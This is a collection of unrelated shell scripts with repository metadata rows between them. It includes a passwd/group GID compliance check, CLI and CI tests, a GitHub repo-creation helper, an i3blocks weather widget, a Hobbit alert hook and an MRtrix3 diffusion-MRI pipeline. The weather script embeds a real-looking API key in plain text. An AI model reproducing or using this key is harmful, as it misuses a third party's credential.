EPG=$(cut -d: -f4 /etc/passwd | uniq)
EGG=$(cut -d: -f3 /etc/group | uniq)
for group in $EPG; do
# if ! grep -Eq "^$group$" <<< "$EGG"; then
# Match $group as a whole word (start-of-line or after whitespace, word
# boundary after) in the defined-GID list; empty match means it is missing.
if [ -z "$(echo "$EGG" | grep -E "(^|\s)$group\b")" ]; then
# Accumulate missing GIDs space-separated for the failure message.
[ -n "$output" ] && output="$output $group" || output=$group
fi
done
[ -z "$output" ] && passing=true
# If the test passes, we pass
if [ "$passing" = true ] ; then
echo "All groups in /etc/passwd exist in /etc/group"
exit "${XCCDF_RESULT_PASS:-101}"
else
# print the reason why we are failing
echo "The group(s) \"$output\" exist in /etc/passwd but don't exist in /etc/group"
exit "${XCCDF_RESULT_FAIL:-102}"
fi
| true
|
76522ddcbaeef9337f191a89b30b7a7c8fd0fb62
|
Shell
|
ucarion/wikiracer
|
/integration_test.sh
|
UTF-8
| 1,401
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# End-to-end tests for the wikiracer CLI: build and install it, then
# compare its stdout for known start/end article pairs.
# NOTE(review): these tests hit live Wikipedia, so results depend on the
# current link graph; the chosen pairs were stable at time of writing.
go get ./wikiracer
go install ./wikiracer
# Terminal styling for pass/fail messages.
bold=$(tput bold)
red=$(tput setaf 1)
reset=$(tput sgr0)
# assert_output_equals <actual> <expected>:
# print a bold pass message on match, a bold red failure and exit 1 otherwise.
assert_output_equals() {
if [[ "$1" == "$2" ]]; then
echo "${bold}Assertion passed: output did equal: ${2}${reset}"
else
echo "${bold}${red}Assertion failed: output did not equal: ${2}${reset}"
exit 1
fi
}
# Test output when one of the articles is a dead-end
assert_output_equals \
"$(wikiracer find "Mike Tyson" "User:Ucarion" 2>/dev/null)" \
"No path found."
assert_output_equals \
"$(wikiracer find "Mike Tyson" "User:Ucarion" --format=json 2>/dev/null)" \
"null"
# Test trivial zero-step path
assert_output_equals \
"$(wikiracer find "Mike Tyson" "Mike Tyson" 2>/dev/null)" \
"Mike Tyson"
assert_output_equals \
"$(wikiracer find "Mike Tyson" "Mike Tyson" --format=json 2>/dev/null)" \
"[\"Mike Tyson\"]"
# TODO Test one-step paths? I haven't found a reliable real-world way to produce
# them.
# Test two-step path
assert_output_equals \
"$(wikiracer find "Kevin Bacon" "Paul Erdős" 2>/dev/null)" \
"Kevin Bacon -> Erdős number -> Paul Erdős"
assert_output_equals \
"$(wikiracer find "Kevin Bacon" "Paul Erdős" --format=json 2>/dev/null)" \
"[\"Kevin Bacon\",\"Erdős number\",\"Paul Erdős\"]"
# Test title normalization and URLs
assert_output_equals \
"$(wikiracer find "en.wikipedia.org/wiki/Albert_Einstein" "albert Einstein" 2>/dev/null)" \
"Albert Einstein"
| true
|
8ca43c4d06ec16ff40af9c2df923f3c53410d1ea
|
Shell
|
ZbZn905888/redisson
|
/create_orgs_repo.sh
|
UTF-8
| 423
| 2.65625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Create a GitHub repository under an organization via the REST API, then
# push the current directory's initial commit to it over SSH.
# NOTE(review): `curl -u $USER_NAME` prompts interactively for a password,
# so this cannot run unattended; consider a token instead.
USER_NAME="rollenholt"
ORGS_NAME="rollenholt-SourceReading"
PROJECT_NAME="redisson"
PROJECT_DESCRIPTION="redisson 源码阅读"
git init
git add .
git commit -m 'first commit'
# POST /orgs/<org>/repos creates the repository with the given name/description.
curl -u $USER_NAME https://api.github.com/orgs/"$ORGS_NAME"/repos -d "{\"name\":\"$PROJECT_NAME\", \"description\": \"$PROJECT_DESCRIPTION\"}"
git remote add origin git@github.com:$ORGS_NAME/"$PROJECT_NAME".git
git push -u origin master
| true
|
a9566f6d1bfd36698a3b0259af5181b5a579cdf1
|
Shell
|
amirkarimi/cas
|
/ci/tests/webapp/validate-embedded-webapp.sh
|
UTF-8
| 2,809
| 3.78125
| 4
|
[
"LicenseRef-scancode-free-unknown",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
#!/bin/bash
# CI check: build the CAS web application WAR for a given embedded servlet
# container, boot it, and verify that /cas/login answers HTTP 200.
#
# Arguments:
#   $1 - embedded container flavor (selects the
#        :webapp:cas-server-webapp-<type> Gradle module)
#
# Honors "[show streams]" / "[rerun tasks]" / "[refresh dependencies]"
# markers in the Travis commit message to tweak the Gradle invocation.
gradle="./gradlew "
gradleBuild=""
gradleBuildOptions="--build-cache --configure-on-demand --no-daemon "
webAppServerType="$1"
echo -e "***********************************************"
echo -e "Gradle build started at `date` for web application server ${webAppServerType}"
echo -e "***********************************************"
# Build only the selected webapp module; skip checks/tests/javadoc for speed.
gradleBuild="$gradleBuild :webapp:cas-server-webapp-${webAppServerType}:build -x check -x test -x javadoc -DskipNestedConfigMetadataGen=true -DskipGradleLint=true "
if [[ "${TRAVIS_COMMIT_MESSAGE}" == *"[show streams]"* ]]; then
gradleBuild="$gradleBuild -DshowStandardStreams=true "
fi
if [[ "${TRAVIS_COMMIT_MESSAGE}" == *"[rerun tasks]"* ]]; then
gradleBuild="$gradleBuild --rerun-tasks "
fi
if [[ "${TRAVIS_COMMIT_MESSAGE}" == *"[refresh dependencies]"* ]]; then
gradleBuild="$gradleBuild --refresh-dependencies "
fi
if [ -z "$gradleBuild" ]; then
echo "Gradle build will be ignored since no commands are specified to run."
else
tasks="$gradle $gradleBuildOptions $gradleBuild"
echo -e "***************************************************************************************"
echo $tasks
echo -e "***************************************************************************************"
eval $tasks
retVal=$?
echo -e "***************************************************************************************"
echo -e "Gradle build finished at `date` with exit code $retVal"
echo -e "***************************************************************************************"
if [ $retVal == 0 ]; then
echo "Gradle build finished successfully."
echo "Preparing CAS web application WAR artifact..."
# Normalize the versioned WAR name so the launch command below is stable.
mv webapp/cas-server-webapp-"${webAppServerType}"/build/libs/cas-server-webapp-"${webAppServerType}"-*.war webapp/cas-server-webapp-"${webAppServerType}"/build/libs/cas.war
echo "Launching CAS web application ${webAppServerType} server..."
java -jar webapp/cas-server-webapp-"${webAppServerType}"/build/libs/cas.war --server.ssl.enabled=false --server.port=8080 &> /dev/null &
pid=$!
echo "Launched CAS with pid ${pid}. Waiting for CAS server to come online..."
# Give the embedded container time to boot before probing the login page.
sleep 60
cmd=`curl --connect-timeout 60 -s -o /dev/null -I -w "%{http_code}" http://localhost:8080/cas/login`
kill -9 "${pid}"
echo "CAS server is responding with HTTP status code ${cmd}."
if [ "$cmd" == 200 ]; then
echo "CAS server with ${webAppServerType} is successfully up and running."
exit 0
else
echo "CAS server with ${webAppServerType} failed to start successfully."
exit 1
fi
else
echo "Gradle build did NOT finish successfully."
exit $retVal
fi
fi
| true
|
b5dfd607d0ce4a70d6dedb0e7306990b3638dd5b
|
Shell
|
StephenBrown2/dotfiles
|
/tag-i3blocks/config/i3blocks/blocks/weather
|
UTF-8
| 2,983
| 2.859375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Based on http://openweathermap.org/current
# i3blocks weather widget: query OpenWeatherMap for the configured location,
# print "icon description temp" (long), "icon temp" (short), and exit 33
# (urgent) when the temperature is out of range or an API error occurred.
# NOTE(review): the API key is hardcoded and committed; prefer an env var.
API_KEY="8a16c18406dea239a9a5cbd13eac8707"
MURICA=true
URGENT_LOWER=273
URGENT_HIGHER=310
UNITS="kelvin"
SYMBOL="K"
if [[ "${MURICA}" = true ]]; then
URGENT_LOWER=32
URGENT_HIGHER=100
UNITS="imperial"
# The second SYMBOL assignment wins; the first is kept as an alternative glyph.
SYMBOL="℉"
SYMBOL="°F"
elif [[ "${MURICA}" = false ]]; then
URGENT_LOWER=0
URGENT_HIGHER=37
SYMBOL="℃"
SYMBOL="°C"
UNITS="metric"
fi
# Font-icon glyphs (require an icon font in the bar).
ICON_SUNNY=""
ICON_CLOUDY=""
ICON_RAINY=""
ICON_STORM=""
ICON_SNOW=""
# Check on http://openweathermap.org/find
BASE_URL="http://api.openweathermap.org/data/2.5/weather?appid=${API_KEY}&units=${UNITS}"
# BLOCK_INSTANCE selects the location; accepted formats (matched below):
# 7-digit city id, 5-digit ZIP, ZIP,CC, lat,lon, or "City Name,CC".
INSTANCE="${BLOCK_INSTANCE:-4726206}"
if [[ "${INSTANCE}" =~ ^[0-9]{7}$ ]]; then
CITY_ID=${INSTANCE}
WEATHER_URL="${BASE_URL}&id=${CITY_ID}"
elif [[ "${INSTANCE}" =~ ^[0-9]{5}$ ]]; then
CITY_ZIP=${INSTANCE}
WEATHER_URL="${BASE_URL}&zip=${CITY_ZIP}"
elif [[ "${INSTANCE}" =~ ^([0-9]{5}),([a-zA-Z]{2})$ ]]; then
CITY_ZIP=${BASH_REMATCH[1]}
COUNTRY_CODE=${BASH_REMATCH[2]}
WEATHER_URL="${BASE_URL}&zip=${CITY_ZIP},${COUNTRY_CODE}"
elif [[ "${INSTANCE}" =~ ^([0-9.-]+),([0-9.-]+)$ ]]; then
LAT=${BASH_REMATCH[1]}
LON=${BASH_REMATCH[2]}
WEATHER_URL="${BASE_URL}&lat=${LAT}&lon=${LON}"
elif [[ "${INSTANCE}" =~ ^([a-zA-Z ]+),([a-zA-Z]{2})$ ]]; then
# URL-encode spaces in the city name.
CITY_NAME=$( echo "${BASH_REMATCH[1]}" | sed 's/ /%20/g')
COUNTRY_CODE=${BASH_REMATCH[2]}
WEATHER_URL="${BASE_URL}&q=${CITY_NAME},${COUNTRY_CODE}"
else
echo "Didn't match anything."
echo "This should never happen."
exit 22
fi
WEATHER_INFO=$(curl -s "${WEATHER_URL}")
# Parse JSON fields with jshon; cod/message are only present on API errors.
ERROR_CODE=$(echo "${WEATHER_INFO}" | jshon -e cod -u 2>/dev/null)
ERROR_MESSAGE=$(echo "${WEATHER_INFO}" | jshon -e message -u 2>/dev/null)
WEATHER_MAIN=$(echo "${WEATHER_INFO}" | jshon -e weather -a -e main -u)
WEATHER_DESC=$(echo "${WEATHER_INFO}" | jshon -e weather -a -e description -u)
WEATHER_TEMP=$(echo "${WEATHER_INFO}" | jshon -e main -e temp | awk '{printf "%.2f", $1}')
WEATHER_ICON=$(echo "${WEATHER_INFO}" | jshon -e weather -a icon)
ICON_URL="http://openweathermap.org/img/w/${WEATHER_ICON}.png"
# Map the broad condition to a glyph; Extreme forces the urgent exit path
# by collapsing the acceptable temperature range to empty.
if [[ "${WEATHER_MAIN}" = *Snow* ]]; then
ICON="${ICON_SNOW}"
elif [[ "${WEATHER_MAIN}" = *Rain* ]] || [[ "${WEATHER_MAIN}" = *Drizzle* ]]; then
ICON="${ICON_RAINY}"
elif [[ "${WEATHER_MAIN}" = *Cloud* ]]; then
ICON="${ICON_CLOUDY}"
elif [[ "${WEATHER_MAIN}" = *Clear* ]]; then
ICON="${ICON_SUNNY}"
elif [[ "${WEATHER_MAIN}" = *Extreme* ]]; then
URGENT_LOWER=0
URGENT_HIGHER=0
ICON=""
elif [[ -n ${ERROR_CODE} ]]; then
WEATHER_DESC=${ERROR_MESSAGE}
WEATHER_TEMP="Err: ${ERROR_CODE}"
SYMBOL=""
ICON=""
else
ICON=""
fi
# i3blocks protocol: long text, short text, color (empty), urgent via exit 33.
echo "${ICON} ${WEATHER_DESC} ${WEATHER_TEMP}${SYMBOL}"
echo "${ICON} ${WEATHER_TEMP}${SYMBOL}"
echo ""
if [[ -n ${ERROR_CODE} ]] || [[ "${URGENT_LOWER}" -eq "${URGENT_HIGHER}" ]] || [[ "${WEATHER_TEMP%.*}" -lt "${URGENT_LOWER}" ]] || [[ "${WEATHER_TEMP%.*}" -gt "${URGENT_HIGHER}" ]]; then
exit 33
fi
| true
|
f0379b94c26edf3afa6c45d75aadd88f3ce0b9cc
|
Shell
|
GrowSense/Index
|
/test-monitor.sh
|
UTF-8
| 366
| 2.578125
| 3
|
[] |
no_license
|
# Smoke-test the garden monitor scripts: clean the working state, remove any
# existing garden devices, then create monitor services for a hard-coded
# test device on ttyUSB0. The && chain aborts on the first failing step.
MONITOR_LABEL="MyMonitor"
MONITOR_DEVICE_NAME="mymonitor"
MONITOR_PORT="ttyUSB0"
echo "----------" && \
echo "Testing monitor scripts" && \
echo "----------" && \
sh clean.sh && \
sh remove-garden-devices.sh && \
echo "" && \
echo "Creating garden monitor services" && \
echo "" && \
sh create-garden-monitor.sh $MONITOR_LABEL $MONITOR_DEVICE_NAME $MONITOR_PORT
| true
|
0040b0ac1d52febb55d3667c53ae18b231a8588c
|
Shell
|
liujiamingustc/phd
|
/docker/water/delft3d/docker-hub/DOCKER_CFD-deltares-delft3d-master/make.sh
|
UTF-8
| 1,793
| 3.765625
| 4
|
[
"LicenseRef-scancode-public-domain",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Task runner for building/pushing Delft3D Docker images.
# Usage: ./make.sh <task>   (run with no/unknown task to list tasks)
set -e
function print_help {
printf "Available Commands:\n";
# Self-documenting help: the first awk finds each `function run_<name>` line
# in this file and emits sed line selectors for that line and the one above
# it; eval'd sed extracts those lines, paste pairs them, and the remaining
# sed/awk strip the boilerplate so "<name>  <inline # comment>" is printed.
awk -v sq="'" '/^function run_([a-zA-Z0-9-]*)\s*/ {print "-e " sq NR "p" sq " -e " sq NR-1 "p" sq }' make.sh \
| while read line; do eval "sed -n $line make.sh"; done \
| paste -d"|" - - \
| sed -e 's/^/ /' -e 's/function run_//' -e 's/#//' -e 's/{/ /' \
| awk -F '|' '{ print " " $2 "\t" $1}' \
| expand -t 30
}
function run_checkout-6906 { #checkout the Delft3D version tagged as 6906
svn co https://svn.oss.deltares.nl/repos/delft3d/tags/6906/
}
function run_build-6906 { #build the Delft3D Docker container for 6906
if [ ! -d "6906" ]; then echo "please checkout the source code first"; exit 1; fi;
docker build -t quay.io/nerdalize/deltares-delft3d:6906 -f 6906.Dockerfile .
}
function run_checkout-6906-extwithr { #checkout the Delft3D version with R and extended boundary
svn co https://svn.oss.deltares.nl/repos/delft3d/tags/6906/ 6906-extwithr
#TODO: automate boundary changes
}
function run_build-6906-extwithr { #build the Delft3D Docker container with R and extended boundary
if [ ! -d "6906-extwithr" ]; then echo "please checkout the source code first"; exit 1; fi;
docker build -t quay.io/nerdalize/deltares-delft3d:6906-extwithr -f 6906-extwithr.Dockerfile .
}
function run_push-6906-extwithr { #push the Delft3D Docker container with R and extended boundary
if [ ! -d "6906-extwithr" ]; then echo "please checkout the source code first"; exit 1; fi;
docker push quay.io/nerdalize/deltares-delft3d:6906-extwithr
}
# Dispatch on the first argument; anything unrecognized prints the help.
case $1 in
"checkout-6906") run_checkout-6906 ;;
"build-6906") run_build-6906 ;;
"checkout-6906-extwithr") run_checkout-6906-extwithr ;;
"build-6906-extwithr") run_build-6906-extwithr ;;
"push-6906-extwithr") run_push-6906-extwithr ;;
*) print_help ;;
esac
| true
|
141b45ce56e298b47341c5c8cd06447292cb62e5
|
Shell
|
XuQiao/HI
|
/CMSSW_4_4_7/src/flowAnalysis/SkimTrack/test/pbs/submitall.sh
|
UTF-8
| 412
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# Split the file list into chunks of $nfilesperjob lines and submit one PBS
# job per chunk via qsub, passing the [BEGIN, END) line range to jobsub.pbs.
# cat|wc keeps the original "missing file -> 0 files" behavior.
nfiles=$(cat filelistAll.dat | wc -l)
nfilesperjob=20
# Integer division; the final (possibly partial) chunk is job number $njobs.
njobs=$((nfiles / nfilesperjob))
echo "split into $(($njobs+1)) jobs, $nfilesperjob files per job"
for i in $( seq 0 $njobs );do
    begin=$((i * nfilesperjob))
    end=$(((i + 1) * nfilesperjob))
    # The last job takes whatever lines remain.
    if [[ $i == $njobs ]];then
        end=$nfiles
    fi
    qsub -v I=$i,BEGIN=$begin,END=$end -N job$i -z jobsub.pbs
done
| true
|
8b70ceca2ef3a38f2dfdb6e092a86704c404c163
|
Shell
|
zorille/php_depot
|
/monitoring/hobbit/alert.sh
|
UTF-8
| 1,050
| 3.375
| 3
|
[] |
no_license
|
#!/usr/local/bin/bash
# Hobbit/Xymon alert hook. On a RECOVERED event it mails "all clear" and
# resets the nagios state file; otherwise it looks up the failing service
# in <host>_config (format "<x>:<level>:<service>") and escalates by level:
#   1 = CRITICAL mail + SMS, 2 = CRITICAL mail, 3 = WARNING mail.
# Relies on Hobbit-provided env vars: BBALPHAMSG, ACKCODE, BBHOSTSVC,
# BBHOSTNAME, BBSVCNAME, RECOVERED, plus MAIL and DATE command paths.
DOSSIER_CONFIG=/home/hobbit/server/etc/config
# envoi_mail <INFO> <COLOR>: mail the alert body with a descriptive subject.
# Note: INFO/COLOR are global; envoi_sms reuses INFO set here.
function envoi_mail
{
INFO=$1
COLOR=$2
#echo "$BBALPHAMSG" | ${MAIL} "Hobbit [${ACKCODE}] ${BBHOSTSVC} ${INFO} (${COLOR})" tech-exploitation@client.com
echo "$BBALPHAMSG" | ${MAIL} "Hobbit [${ACKCODE}] ${BBHOSTSVC} ${INFO} (${COLOR})" dv@client.com
return 0
}
function envoi_sms
{
# send an SMS via nagios (write an error state for nagios to pick up)
echo "2|${INFO} `${DATE} +%H:%M:%S` : ${BBHOSTSVC} est en ERREUR" > ${DOSSIER_CONFIG}/nagios_etat.log
return 0
}
#env >${DOSSIER_CONFIG}/tempo.txt
if [ "${RECOVERED}" == "1" ]
then
envoi_mail RECOVERED GREEN
echo "0|Tout est OK dans Hobbit" > ${DOSSIER_CONFIG}/nagios_etat.log
exit 0
fi
# Scan this host's config (ignoring comment lines) for the failing service.
for ligne in `cat ${DOSSIER_CONFIG}/${BBHOSTNAME}_config |egrep -v "^#"`
do
MONITEUR=`echo ${ligne} | cut -d : -f 3`
if [ "${MONITEUR}" == "${BBSVCNAME}" ]
then
# Field 2 is the escalation level for this service.
NIVEAU=`echo ${ligne} | cut -d : -f 2`
case ${NIVEAU} in
1)
envoi_mail CRITICAL RED
envoi_sms
;;
2)
envoi_mail CRITICAL RED
;;
3)
envoi_mail WARNING YELLOW
;;
*)
echo erreur
;;
esac
fi
done
| true
|
e16d5574193dbd9c39abdc0d1fec84f4812b1d2f
|
Shell
|
agilebeat-inc/maprover--data-amass
|
/pkginstall.sh
|
UTF-8
| 792
| 4
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Build the 'pipe1' package sdist and (re)install it with pip3.
# Must be run from the main repo directory (the one containing pipe1/).
if ! [[ -d 'pipe1' ]]; then
    >&2 echo "This script must be run from the main repo directory!"
    exit 1
fi
# remove any existing 'dist' files in case there are old versions:
if [[ -d 'dist' ]]; then
    rm -r ./dist
fi
# create the blob that pip can install
# BUG FIX: the original captured stdout into $res and compared it with -ne 0,
# i.e. treated the build log as an exit code. Check the real exit status.
python3 setup.py sdist > /dev/null
res=$?
if [[ ${res} -ne 0 ]]; then
    >&2 echo "Error code ${res} in setup.py run!"
    exit ${res}
fi
# if the package is currently installed, we don't want to re-install dependencies
# but we do want to re-install if this command has been run
pip3 show pipe1 > /dev/null
if [[ $? -eq 0 ]]; then
    echo "Re-installing package 'pipe1'!"
    pip3 install ./dist/*.gz --no-deps --force-reinstall
else
    echo "Installing pipe1 for the first time!"
    pip3 install ./dist/*.gz
fi
| true
|
953408cbc65c919927d4b50edab2137229a293f9
|
Shell
|
mujingyuan/ansible_resource
|
/scripts/create_mongodb_replicas.sh
|
UTF-8
| 625
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Deploy a MongoDB replica set via ansible-playbook.
#
# Arguments:
#   $1 - environment (selects the inventory directory)
#   $2 - project name (selects inventory file and SSH key)
#   $3 - inventory target for the MongoDB master
#   $4 - inventory target(s) for the MongoDB replicas
ansible_resource_dir=/data/www/ansible_handler/ansible_resource
environment=$1
project=$2
mongodb_master_target=$3
mongodb_replicas_target=$4
# Paths derived from the environment/project naming convention.
inventory_file=${ansible_resource_dir}/data/inventory/${environment}/${project}
playbook_file=${ansible_resource_dir}/playbooks/deploy_mongodb.yml
key_file=${ansible_resource_dir}/data/common/keys/${project}_${environment}
# StrictHostKeyChecking=no: accept unknown hosts (first provisioning run).
ansible-playbook --key-file=${key_file} --ssh-extra-args="-o StrictHostKeyChecking=no" -i ${inventory_file} -e "mongodb_master_target=$mongodb_master_target mongodb_replicas_target=$mongodb_replicas_target project=$project" ${playbook_file}
| true
|
ba8b401c7b8e9b4631a28b263df0905fb450c92d
|
Shell
|
jrussell9000/NeuroScripts
|
/old/DWI_Processing_v1/Old/multifiber.sh
|
UTF-8
| 7,445
| 3.3125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# DWI tractography pipeline (MRtrix3 + ANTs + FSL + FreeSurfer):
# convert preprocessed DWI, estimate response functions / FODs, skull-strip
# and register the T1, run 5ttgen and FreeSurfer HCPMMP parcellation, then
# generate a SIFT2-weighted tractogram and connectome matrices.
# All paths are hardcoded to a single subject; the commented-out positional
# arguments below suggest parameterization was planned.
set -e
# preproc_done_dir=$1
# working_dir=$2
# anat_dir=$3
#Directory to the OASIS Templates from the ANTs GitHub page (MICCAI2012-Multi-Atlas-Challenge-Data)
INPUT_DIR="/home/jdrussell3/ceda_scans/1000_C1/dicoms"
ANTSTEMPLATES="/home/jdrussell3/apps/ants/ants-templates/MICCAI2012-Multi-Atlas-Challenge-Data"
preproc_done_dir="/home/jdrussell3/ceda_scans/1000_C1/dwi_processing/preproc"
working_dir="/home/jdrussell3/ceda_scans/1000_C1/dwi_processing/mrtrixproc"
anat_dir="/home/jdrussell3/ceda_scans/1000_C1/dwi_processing/anat"
# Derive the MRtrix3 install root from the mrview binary location
# (two path components up from .../bin/mrview).
mrtrix_dir=$(command -v mrview)
if [ -z "${mrtrix_dir}" ]; then
printf "MRTrix3 not found. Verify that MRTrix3 is included in the path"
else
mrtrix_dir=${mrtrix_dir%/*/*}
fi
# Make temporary directories for processing
# Sets the global TMP to a fresh random /tmp/proc_XXXXXXXX directory.
# NOTE(review): mktemp -d would be the safer standard way to do this.
tmp_dir() {
unset rand
unset TMP
rand=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1)
TMP=/tmp/proc_${rand}
mkdir "${TMP}"
}
if [ -d "${working_dir}" ]; then
rm -rf "${working_dir}"
fi
mkdir "${working_dir}"
#Bring in the finished preprocessed scan file
mrconvert -fslgrad "${preproc_done_dir}"/PA_AP.bvec "${preproc_done_dir}"/PA_AP.bval "${preproc_done_dir}"/eddy_unwarped_images.nii.gz "${working_dir}"/dwi.mif
cd "${working_dir}" || exit
#MASK CREATION
dwi2mask dwi.mif dwi_mask.mif
maskfilter dwi_mask.mif dilate dwi_mask_dilated.mif -npass 3
#SPHERICAL DECONVOLUTION
dwi2response dhollander dwi.mif response_wm.txt response_gm.txt response_csf.txt -mask dwi_mask.mif
dwi2fod msmt_csd dwi.mif response_wm.txt FOD_WM.mif response_gm.txt FOD_GM.mif response_csf.txt FOD_CSF.mif -mask dwi_mask_dilated.mif -lmax 10,0,0
mrconvert FOD_WM.mif FOD_WM_temp.mif -coord 3 0
mrcat FOD_CSF.mif FOD_GM.mif FOD_WM_temp.mif tissues.mif -axis 3
rm FOD_WM_temp.mif
#ANATOMICAL PROCESSING
if [ -d "${anat_dir}" ]; then
rm -rf "${anat_dir}"
fi
mkdir "${anat_dir}"
# Unpack the MPRAGE dicom archive(s) and convert to NIfTI.
for file in "${INPUT_DIR}"/*MPRAGE*.tgz; do
tmp_dir
cp "$file" "$TMP"
tar xf "$TMP"/"$(basename "${file}")" -C "$TMP"
dcm2niix -z y "$TMP"
imcp "$TMP"/*.nii.gz "${anat_dir}"/T1.nii.gz
#cp "$TMP"/*.bval "$OUTPUT_DIR"/raw/"$pos_enc".bval - Must use the bval and bvec files from the scanner, values in dicoms are incorrect
#cp "$TMP"/*.bvec "$OUTPUT_DIR"/raw/"$pos_enc".bvec
cp "$TMP"/*.json "${anat_dir}"/T1.json
rm -rf "${TMP}"
done
cd "${anat_dir}" || exit 1
cp "${ANTSTEMPLATES}"/T_template0.nii.gz "${ANTSTEMPLATES}"/T_template0_BrainCerebellumProbabilityMask.nii.gz \
"${ANTSTEMPLATES}"/T_template0_BrainCerebellumRegistrationMask.nii.gz "${anat_dir}"
antsBrainExtraction.sh -d 3 -a T1.nii.gz -e T_template0.nii.gz \
-m T_template0_BrainCerebellumProbabilityMask.nii.gz -o output.nii.gz -f T_template0_BrainCerebellumRegistrationMask.nii.gz
#PREPARING FILES FOR REGISTRATION
mrconvert "${anat_dir}"/T1.nii.gz "${working_dir}"/T1.mif
# antsBrainExtraction prefixes its outputs with the -o value, hence the
# odd "output.nii.gzBrainExtraction*" file names.
mrconvert "${anat_dir}"/output.nii.gzBrainExtractionBrain.nii.gz "${working_dir}"/T1_sscorr_brain.mif
mrconvert "${anat_dir}"/output.nii.gzBrainExtractionMask.nii.gz "${working_dir}"/T1_sscorr_mask.mif
cd "${working_dir}" || exit 1
# Build mean b=0 / pseudo-contrast images for contrast-matched registration.
dwiextract dwi.mif -bzero dwi_bzero.mif
mrcalc dwi_bzero.mif 0.0 -max dwi_bzero_0max.mif
mrmath dwi_bzero_0max.mif mean -axis 3 dwi_meanbzero.mif
mrcalc 1 dwi_meanbzero.mif -div dwi_mask.mif -mult dwi_div.mif
mrhistmatch nonlinear dwi_div.mif T1_sscorr_brain.mif dwi_pseudoT1.mif -mask_input dwi_mask.mif -mask_target T1_sscorr_mask.mif
mrcalc 1 T1_sscorr_brain.mif -div T1_sscorr_mask.mif -mult T1_div.mif
mrhistmatch nonlinear T1_div.mif dwi_meanbzero.mif T1_pseudobzero.mif -mask_input T1_sscorr_mask.mif -mask_target dwi_mask.mif
#T1->DWI REGISTRATION
# Two rigid registrations (T1->pseudoT1 and pseudobzero->bzero) are averaged
# into a single T1->DWI transform.
mrregister -force T1_sscorr_brain.mif dwi_pseudoT1.mif -type rigid -mask1 T1_sscorr_mask.mif -mask2 dwi_mask.mif -rigid rigid_T1_to_pseudoT1.txt
mrregister -force T1_pseudobzero.mif dwi_meanbzero.mif -type rigid -mask1 T1_sscorr_mask.mif -mask2 dwi_mask.mif -rigid rigid_pseudobzero_to_bzero.txt
transformcalc -force rigid_T1_to_pseudoT1.txt rigid_pseudobzero_to_bzero.txt average rigid_T1_to_dwi.txt
mrtransform -force T1.mif T1_registered.mif -linear rigid_T1_to_dwi.txt
mrconvert -force T1_sscorr_mask.mif T1_mask.mif -datatype bit
mrtransform -force T1_mask.mif T1_mask_registered.mif -linear rigid_T1_to_dwi.txt -template T1_registered.mif -interp nearest -datatype bit
# rm T1_sscorr_brain.mif
# rm dwi_meanbzero.mif
# rm rigid_T1_to_pseudoT1.txt
# rm rigid_pseudobzero_to_bzero.txt
# rm T1.mif
recon_dir="${anat_dir}"/recon
if [ -d "$recon_dir" ] ; then
rm -rf "${recon_dir}"
fi
mkdir "${recon_dir}"
cp T1_registered.mif T1_mask_registered.mif "${anat_dir}"
cd "${anat_dir}" || exit 1
#GENERATE 5TT IMAGE
fivettgen_dir=${anat_dir}/fivettgen
mkdir ${fivettgen_dir}
cp T1_registered.mif T1_mask_registered.mif "${fivettgen_dir}"
cd "${fivettgen_dir}" || exit 1
5ttgen fsl T1_registered.mif 5TT.mif -mask T1_mask_registered.mif
5tt2vis 5TT.mif vis.mif
#PARCELLATE THE REGISTERED T1
cp T1_registered.mif T1_mask_registered.mif "${anat_dir}"
ln -s "$SUBJECTS_DIR"/fsaverage "${recon_dir}"/fsaverage
ln -s "$SUBJECTS_DIR"/rh.EC_average "${recon_dir}"/rh.EC_average
ln -s "$SUBJECTS_DIR"/lh.EC_average "${recon_dir}"/lh.EC_average
mrconvert T1_registered.mif T1_registered.nii
recon-all -sd "${recon_dir}" -subjid freesurfer -i T1_registered.nii
time recon-all -sd "${recon_dir}" -subjid freesurfer -all -mprage
#Does fsaverage containi the HCPMMP annotations, or do we need to get them?
hemispheres="lh rh"
# Map the HCPMMP1 annotation from fsaverage onto this subject's surfaces.
for hemi in $hemispheres; do
SUBJECTS_DIR="${recon_dir}"
mri_surf2surf --srcsubject fsaverage --trgsubject freesurfer --hemi "${hemi}" --sval-annot "${SUBJECTS_DIR}"/fsaverage/label/"${hemi}".HCPMMP1.annot \
--tval "${SUBJECTS_DIR}"/freesurfer/label/"${hemi}".HCPMMP1.annot
done
cd "${recon_dir}" || exit 1
mri_aparc2aseg --s freesurfer --old-ribbon --annot HCPMMP1 --o aparc.HCPMMP1+aseg.mgz
labelconvert "${recon_dir}"/aparc.HCPMMP1+aseg.mgz "${mrtrix_dir}"/share/mrtrix3/labelconvert/hcpmmp1_original.txt \
"${mrtrix_dir}"/share/mrtrix3/labelconvert/hcpmmp1_ordered.txt parc_init.mif
labelsgmfix parc_init.mif ../T1_registered.mif "${mrtrix_dir}"/share/mrtrix3/labelconvert/hcpmmp1_ordered.txt parc.mif
n_nodes=$(mrstats parc.mif -output max)
#n_streamlines=$((500 * n_nodes * $((n_nodes -1)) ))
cp 5TT.mif "${anat_dir}"
cd "${working_dir}" || exit
# trackproc_dir="${working_dir}"/trackproc
# if [ -d "${trackproc_dir}" ]; then
#     rm -rf "${trackproc_dir}"
# fi
# mkdir "${trackproc_dir}"
# cd "${trackproc_dir}" || exit
cp "${fivettgen_dir}"/5TT.mif "${working_dir}"
# Tractography + SIFT2 weighting, then track-density and connectome outputs.
tckgen FOD_WM.mif tractogram.tck -act 5TT.mif -backtrack -crop_at_gmwmi -maxlength 250 -power 0.33 -select 1000000 -seed_dynamic FOD_WM.mif
tcksift2 tractogram.tck FOD_WM.mif weights.csv -act 5TT.mif -out_mu mu.txt -fd_scale_gm
tckmap tractogram.tck -tck_weights_in weights.csv -template FOD_WM.mif -precise track.mif
mu=$(cat mu.txt)
mrcalc track.mif "${mu}" -mult tdi_native.mif
